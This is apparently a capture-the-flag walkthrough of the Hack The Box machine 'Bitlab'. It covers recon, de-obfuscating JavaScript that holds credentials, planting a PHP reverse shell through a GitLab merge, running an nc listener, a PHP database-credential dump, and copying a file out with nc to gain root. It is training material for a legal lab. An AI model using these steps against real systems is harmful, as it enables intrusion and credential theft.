This machine is Bitlab from Hack The Box


First a service discovery scan

root@kali:~# nmap -sV -p-
Starting Nmap 7.70 ( ) at 2019-10-22 13:29 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 216.49 seconds


Started on the webserver

Screenshot 1

So I ran dirbuster

Screenshot 2

One file caught my attention

Screenshot 3

The gitlab login link was actually JS


I cleaned this up

'use strict';
(function() {
  /** @type {!Array} */
  var a = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
  document[a[2]](a[1])[a[0]] = a[3];
  document[a[2]](a[4])[a[0]] = a[5];

Creds are


And used them on the sign in page

Screenshot 4

Checking the deployer project and inside the index.php

Screenshot 5

So if I merge something into the profile repo, it gets pulled. So I checked the profile repo

Screenshot 6

If it's in the web root I may be able to use it to deploy php, so I checked

Screenshot 7

So if I merge php it'll show up here, I took a php reverse shell and pointed it at myself and made a branch on

Screenshot 8

I then uploaded the shell file

Screenshot 9

And set a merge request

Screenshot 10

And merged it

Screenshot 11

Screenshot 12

Set a listener

root@kali:~# nc -nlvp 4444

And triggered my shell

In the listener

connect to [] from (UNKNOWN) [] 53798
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 18:04:20 up 39 min,  0 users,  load average: 0.33, 0.18, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Upgrade it and dig

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@bitlab:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 Feb 28  2019 .
drwxr-xr-x 24 root  root  4096 Dec 31  2018 ..
drwxr-xr-x  4 clave clave 4096 Aug  8 14:40 clave

www-data@bitlab:/home$ cd clave
www-data@bitlab:/home/clave$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt

Need to be clave before I can get the flag. So more digging. On the gitlab I found

Screenshot 13

so DB creds


I modified this to create a db dump script called db-dump.php

$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");

while ($row = pg_fetch_row($result)) {
  echo "<br />";

And repeated the process of creating a branch, uploading the file and merging it. I then went to to run it

Screenshot 14


I decoded the b64


So I tried it on ssh, no luck. This stumped me for a while before I tried the actual b64 as the password instead

root@kali:~# ssh [email protected]

Now I can collect the flag

clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt

clave@bitlab:~$ cat user.txt

I'll extract that exe I found earlier

root@kali:~# nc -nlvp 5555 > RemoteConnection.exe

clave@bitlab:~$ nc 5555 < RemoteConnection.exe

Time to inspect it

root@kali:~# file RemoteConnection.exe
RemoteConnection.exe: PE32 executable (console) Intel 80386, for MS Windows

I took a copy over to a Windows VM with immunity debugger and began to test it, while stepping through the execution

Screenshot 15


Tried it as root password on ssh

root@kali:~# ssh [email protected]
Last login: Fri Sep 13 14:11:14 2019

Now to get my flag

root@bitlab:~# id
uid=0(root) gid=0(root) groups=0(root)

root@bitlab:~# ls -la
total 48
drwx------  6 root root 4096 Sep  6 10:42 .
drwxr-xr-x 24 root root 4096 Dec 31  2018 ..
lrwxrwxrwx  1 root root    9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec 31  2018 .bashrc
drwx------  2 root root 4096 Aug  8 13:28 .cache
drwx------  3 root root 4096 Aug  8 13:28 .gnupg
drwxr-xr-x  3 root root 4096 Sep  6 10:40 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Feb 28  2019 root.txt
drw-------  2 root root 4096 Jan  4  2019 .ssh
-rw-------  1 root root 9915 Sep  6 10:42 .viminfo

root@bitlab:~# cat root.txt

